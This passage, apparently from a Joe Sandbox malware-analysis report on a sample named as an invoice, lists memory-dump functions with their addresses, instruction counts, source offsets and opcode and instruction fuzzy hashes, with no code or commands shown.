                                  • Opcode Fuzzy Hash: bccb2b99b587bf8f7b3beec03b86896098757c5131839373117810610dd701d0
                                  • Instruction Fuzzy Hash: B341B270701E119BDB29DB2DC994F7FBBAAEF94620F088219E95787281DB7CD801C791
                                  Function 01A9CBF0 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0a1a3660ec4effa9edbc97a997276bb56cca4baa22d420c5e0f1ea393fc251c
                                  • Instruction ID: 842226b05c380d2b801b9cd8997165ea8e669c77112ba97efe3d870cb3f2de1f
                                  • Opcode Fuzzy Hash: f0a1a3660ec4effa9edbc97a997276bb56cca4baa22d420c5e0f1ea393fc251c
                                  • Instruction Fuzzy Hash: E151AD71900616DFCF20DFA9C980AAEBBF9FF58364B144519E505A3308DB30EE81CB90
                                  Function 01ADA9D3 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction ID: f36f5e1b9242edcb49086067c31a2800f130c7bc82756c61cdbdbb539a84b578
                                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction Fuzzy Hash: FC41F972601B169FDB25CF68C980A6AB7A9FF80210F05862EE95787650EB30FD05C7D1
                                  Function 01A401F8 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3a847259f790e7b2fab04dc822fc36765ac24e04aeba572539a0c71c341dca8
                                  • Instruction ID: 3b2656229b7709eb5c8c0e0746d799b2c65c00d5c5e473e28c6af23b942cff11
                                  • Opcode Fuzzy Hash: e3a847259f790e7b2fab04dc822fc36765ac24e04aeba572539a0c71c341dca8
                                  • Instruction Fuzzy Hash: 8141DF35900219DBDB14DFA8C640AEEBBB5BF88710F18812AFA15F7340D735AC45DBA4
                                  Function 01A3EBFC Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e9c94d24b7851f40f2e23849126ca9d0aa9cc178458261f99b5a28a40812954
                                  • Instruction ID: 2f53e656e4083b68dc12e93ba7e1b8fbd362e5054de2dd209e56881bc6111d3e
                                  • Opcode Fuzzy Hash: 7e9c94d24b7851f40f2e23849126ca9d0aa9cc178458261f99b5a28a40812954
                                  • Instruction Fuzzy Hash: 8A41B1712043019FDB21DF28C984B6BB7F5FF88218F04482AF566C7616EB35E9588B91
                                  Function 01A52750 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction ID: d4f074a7890790bcde46fb36b2d4eb9d55bbfe5f883d05158da2953eaa51d524
                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction Fuzzy Hash: 42515875A00215CFDB15DF9CC580AAEF7B2FF88710F2881AAD915A7351D770AE82CB90
                                  Function 01A16154 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a6cca1a52e4dbc4dd689ea5744ce2ff069bf18f78f7b376646ca35c4ced203c
                                  • Instruction ID: 0c0a67f19dd966f0e49698fd38b8710922c7bcb92e9ea47d0ce10a224a24280c
                                  • Opcode Fuzzy Hash: 3a6cca1a52e4dbc4dd689ea5744ce2ff069bf18f78f7b376646ca35c4ced203c
                                  • Instruction Fuzzy Hash: 9451D570900216DFDB269B68CE00BF9BBB5FF15314F1482AAE529E72D5E7749A81CF40
                                  Function 01A10BCD Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 559bf5cf09c673fafab86c158cac920f2659677946dc82588c7c45865f73cdd5
                                  • Instruction ID: ec1f7471fdcfb349e7bccfe0f02b46fd4f11388bafec40834c17d702423ce29a
                                  • Opcode Fuzzy Hash: 559bf5cf09c673fafab86c158cac920f2659677946dc82588c7c45865f73cdd5
                                  • Instruction Fuzzy Hash: 7A41AF75A00228DBDF21DF6CCA40BEA77B8FF59750F0500A5E948AB241DB349E85CF91
                                  Function 01AD866E Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction ID: e7a8c4cb5f8613239c7a3fe108252a5a0b52842982222b5ae3600c312e9fde7a
                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction Fuzzy Hash: 4D41E675B00605ABDB15DF99CD84AAFBBBAAF88750F154069E902A7341D678DE00C760
                                  Function 01A10887 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c82a2acefd1df878f579b7f86b7da4b9b5b9551bd6f19f30d401b1b829dd57ad
                                  • Instruction ID: 18401fbad07d8f7c67af8e5adb003f6a8f7c6d571e4ecbd328b9131e0d0969ac
                                  • Opcode Fuzzy Hash: c82a2acefd1df878f579b7f86b7da4b9b5b9551bd6f19f30d401b1b829dd57ad
                                  • Instruction Fuzzy Hash: 0B41D4706007019FE725CF28C690A22B7FAFF49314B148A6EE557C7A59E730F885CB90
                                  Function 01A3A470 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9524d444731988c30e36b822975feea89aafac0f7670ee09337c81a34b509ab
                                  • Instruction ID: c5a30ffef21ea82044f93a7e4d823da10a00fbf575bd023b98062f3fa2ad6055
                                  • Opcode Fuzzy Hash: d9524d444731988c30e36b822975feea89aafac0f7670ee09337c81a34b509ab
                                  • Instruction Fuzzy Hash: 9741C232A40225CFDB26EF68D9947AD7BB0FBA8350F040599E555E72D1DB359900CB60
                                  Function 01A18BF0 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a8ab65e3e8a143f3811507a0200e3320ceb345dfeb96d240c762f606f69163b
                                  • Instruction ID: 080033555b4bcc75739fa5ba38b2b301c16e50992a530b7f8bd49f07165ebe6e
                                  • Opcode Fuzzy Hash: 4a8ab65e3e8a143f3811507a0200e3320ceb345dfeb96d240c762f606f69163b
                                  • Instruction Fuzzy Hash: AD412772900202CFD725EF58C980BAABBB5FFA4704F14812EE6059B259C73DD941CF90
                                  Function 01A08918 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 485505ef1ab2de602d987faf91d6af85edeaaf9e557cf96ef18d53c0f6eaaf3b
                                  • Instruction ID: 6215da56c86f43365a2d596ea0ccd67d56de09e762ee3cd7597e63099dbd0636
                                  • Opcode Fuzzy Hash: 485505ef1ab2de602d987faf91d6af85edeaaf9e557cf96ef18d53c0f6eaaf3b
                                  • Instruction Fuzzy Hash: 214162319083069ED312DF69D940A6BB7E9EF88B94F44092AF984D7190E734DE048BE7
                                  Function 01A0A020 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction ID: 26bdfb53603a1e9ffaf98da17ab56daf7aef802be82aaabc66b64381420401d2
                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction Fuzzy Hash: 54412931B00319DFEB22EF6994407BABB75EB50764F19806AE945DB291D633CD80CBA0
                                  Function 01A109AD Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bcee0232a8bc32d82b0432761d3ff663c73038184dd18f19a27e7d6f52097d7e
                                  • Instruction ID: f74a5afedf59bf808d91f66b09a35473861fbb393addb83453162141c79e96a5
                                  • Opcode Fuzzy Hash: bcee0232a8bc32d82b0432761d3ff663c73038184dd18f19a27e7d6f52097d7e
                                  • Instruction Fuzzy Hash: A7417C72A40701EFD721CF28C940B26BBF9FF58314F24866AE449CB255E771E982CB90
                                  Function 01A40710 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction ID: f1cd51efb538b54851421250a8f719376f902af84709f398bfb5520164e6f0b9
                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction Fuzzy Hash: B5417071A00705EFDB25CFA8CA80AAABBF4FF58700B20496DE656D7651E330EA44DF51
                                  Function 01A1262C Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5fee36e75884a088493d9cd2fc02150047fd463b1c24b85bdea27bad52224c21
                                  • Instruction ID: f9605e69b56c84f8fd247786f9fac37fd5a1e8da8c33c9f55f1bf0758819a935
                                  • Opcode Fuzzy Hash: 5fee36e75884a088493d9cd2fc02150047fd463b1c24b85bdea27bad52224c21
                                  • Instruction Fuzzy Hash: E841B1B1901701CFCB26EF28DA00756BBF5FF54310F2486ABC4169B6A9DB30D941CB51
                                  Function 01A4C8F9 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59e0620e1a543badb051dd6b2fe2e58ad3c9b14c8e7cb51f35b8fb52118506a7
                                  • Instruction ID: 12c0403cd9ef19f699db54e555280c8ded651ec05395d2762ffafed04532e95d
                                  • Opcode Fuzzy Hash: 59e0620e1a543badb051dd6b2fe2e58ad3c9b14c8e7cb51f35b8fb52118506a7
                                  • Instruction Fuzzy Hash: 7F31BAB2A01305EFDB12CFA8C540799BBF0FB48724F2085AED119EB252D7369902CF90
                                  Function 01A907C3 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4b74956380216bf727a711fdb721dd275ec5b63f3a9845b4ab0c1ad24648c475
                                  • Instruction ID: ba6d9c9e3a4cc62af84fa3f4c8c83987ed855979a157e879d11e3527538bf208
                                  • Opcode Fuzzy Hash: 4b74956380216bf727a711fdb721dd275ec5b63f3a9845b4ab0c1ad24648c475
                                  • Instruction Fuzzy Hash: DB41AC71608305AFD761DF29C944B9BBBE8FF98764F008A2EF998C7251D7709844CB92
                                  Function 01A080A0 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bfda67a3f34ca3795448e18feebe110c8bb5e737f077b56ee9382abdecfa3c0a
                                  • Instruction ID: 42fe0fb0e8a1edca84fe7450002d495318325b0e92d914063b9e58a91551fca4
                                  • Opcode Fuzzy Hash: bfda67a3f34ca3795448e18feebe110c8bb5e737f077b56ee9382abdecfa3c0a
                                  • Instruction Fuzzy Hash: 2741E371E05716EFDB02DF68D9806A8B7B5FF54760F24822AD816A72C0D738ED418BD4
                                  Function 01A905A7 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7d39e45f950bbd937409d0016dfde09da28d4fcac37e2c6a41005bc0fb29122
                                  • Instruction ID: eaeb572f19a38cb00d3b31d8bc1a0f44143a40750988d645764a0733eb96c04f
                                  • Opcode Fuzzy Hash: a7d39e45f950bbd937409d0016dfde09da28d4fcac37e2c6a41005bc0fb29122
                                  • Instruction Fuzzy Hash: AC41D3725046419FC720DF6CDA40A7BB7E9BFC8740F144619FA548B680E730E944C7A6
                                  Function 01A14859 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9229c58cdea9da6d8587a3443c152af6cac49fd6faefba1bbb1ac9c7f58b04f1
                                  • Instruction ID: 5053a03cfa63f75c6232621ef2e0b85c1fbd49322167b26c1dd9eb6349a49973
                                  • Opcode Fuzzy Hash: 9229c58cdea9da6d8587a3443c152af6cac49fd6faefba1bbb1ac9c7f58b04f1
                                  • Instruction Fuzzy Hash: 4841F5306003028BD726DF2CD994B2ABBEBFF89760F14442DEA45CB299DB70D951CB91
                                  Function 01A08B50 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1bb704e72ef61948bd04e6b3a36e7e12ead3e8be22e2ecbd9340216c4cb6c9c
                                  • Instruction ID: c9056dfc0bfaed9611ff9ed66db4ab1097568de440d8dc73a3d4e7b34de20330
                                  • Opcode Fuzzy Hash: b1bb704e72ef61948bd04e6b3a36e7e12ead3e8be22e2ecbd9340216c4cb6c9c
                                  • Instruction Fuzzy Hash: 5A41B2B1E01605CFCB16CF69D9809ADBBF1FF99320B14862ED466E7290DB389941CF54
                                  Function 01A202E1 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction ID: 999554dc39d59018c2df88a6ce48571f43af2017af80187ebc0bb93154019bf2
                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction Fuzzy Hash: EC31F432A04255AFDB228B6CCD44BABBFF9AF14350F0841A6F855D7352C6749984CBA4
                                  Function 01ABE3DB Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb75b458895ec4e9609b61cf797476f3b87b01649bade5c35dc5051afc71ba28
                                  • Instruction ID: 43926322e39e321a56800bf35ea359dfcd5c412d02397ad2e59a9bfff6f861b1
                                  • Opcode Fuzzy Hash: bb75b458895ec4e9609b61cf797476f3b87b01649bade5c35dc5051afc71ba28
                                  • Instruction Fuzzy Hash: 8B31CD75740756ABD7269F65CD81FEB76B9EF59B50F000024F600AB392DA69DC01C7E0
                                  Function 01AC4B4B Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69e34e493d4771940031d732271686ead0ef8254523e607fde3d7732ae1c5f80
                                  • Instruction ID: 960e26ac437afcad148b379902642bc8fd7a001fc949711ceb6ce49bd0d78fec
                                  • Opcode Fuzzy Hash: 69e34e493d4771940031d732271686ead0ef8254523e607fde3d7732ae1c5f80
                                  • Instruction Fuzzy Hash: A331C1326092118FC335DF1DD890E26B7E6FF88760F09446EE9959B265D730A810CB95
                                  Function 01A14260 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6bb1901c7e4cd045354351531166d8868d25312b8fc70bf6672ffdbc8b36914
                                  • Instruction ID: 5168df24f15d8810ea7c8700287425978e8fe6d4c3afe80d40a6fd82b9844461
                                  • Opcode Fuzzy Hash: a6bb1901c7e4cd045354351531166d8868d25312b8fc70bf6672ffdbc8b36914
                                  • Instruction Fuzzy Hash: 08419F72200B45DFD722CF28CA85BDA7BE9BF59354F058429F6998B260D774E904CB90
                                  Function 01AC4BB0 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfded3bd3678ecde4a3efe3550bf559908ffc52f41291876fe8bf636512e2ba4
                                  • Instruction ID: ebca770e6d645b416824109e804fe8dbbe59b00e9ced75968b10ea41af3b381c
                                  • Opcode Fuzzy Hash: dfded3bd3678ecde4a3efe3550bf559908ffc52f41291876fe8bf636512e2ba4
                                  • Instruction Fuzzy Hash: C831AD716082019FD324DF29C8A0A2AB7E5FB88B20F09456DF9559B2A1E730EC14CB95
                                  Function 01A8EB1D Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c7f5608fafb1fa8906f0768364140c764895f37f5f617f8fb671ee810a348cc
                                  • Instruction ID: c55550d5dd0a861e3e103216a4f8d5646af10a8c80bf0db5fc80ca8b43d86f41
                                  • Opcode Fuzzy Hash: 7c7f5608fafb1fa8906f0768364140c764895f37f5f617f8fb671ee810a348cc
                                  • Instruction Fuzzy Hash: F031E171701682DBF722776DCE4CB257BD8BF45B84F1D84A0AB458B6E2DB28DC80C260
                                  Function 01AD61C3 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbe776c2b9acabb05c977950108317f3ef355b79582a6d6f3dad52fc92f602dd
                                  • Instruction ID: 2f780371821fb7acc671a7b0dba004571b07f4b389855447a009612f56c552ac
                                  • Opcode Fuzzy Hash: cbe776c2b9acabb05c977950108317f3ef355b79582a6d6f3dad52fc92f602dd
                                  • Instruction Fuzzy Hash: DE31E175E0061AABDB15DF98CD40BAEB7B5FB48B40F454168E905AB244D770ED40CBA0
                                  Function 01AB483A Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d0d52c9b24f2c54d243593fe810cb2b32c6e961a2481659a717a0c57e0d1488
                                  • Instruction ID: b699e374f1d0741e207107b5a4cedf5e5845e07b534f6fba7b7223ec06c0fc99
                                  • Opcode Fuzzy Hash: 0d0d52c9b24f2c54d243593fe810cb2b32c6e961a2481659a717a0c57e0d1488
                                  • Instruction Fuzzy Hash: FF315376A4016DABCF21DF58DD84BDE7BBAAB9C310F1000A5E509E7251DB30DE918F90
                                  Function 01A3EB20 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f43fa99812dce13c574fb74e33db77881ddbcf777aff8aea54278bca78e397ae
                                  • Instruction ID: bd7a6b46082b607c3a15bffe01096621d58093b4b38b8631a7983a6d3a8397fe
                                  • Opcode Fuzzy Hash: f43fa99812dce13c574fb74e33db77881ddbcf777aff8aea54278bca78e397ae
                                  • Instruction Fuzzy Hash: 85319372E01215AFDB22DFA9CD40BAEBBF9EF48750F118465F916E7250D6709E008BA0
                                  Function 01AD60B8 Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44f90749e0e28968a6e9003425de7b214d38be92f9cf7ae65e2c8c9999d48f1b
                                  • Instruction ID: b95d7f2ee4d50aae18ae75184306a0b2b119c6df901072df985a947679411863
                                  • Opcode Fuzzy Hash: 44f90749e0e28968a6e9003425de7b214d38be92f9cf7ae65e2c8c9999d48f1b
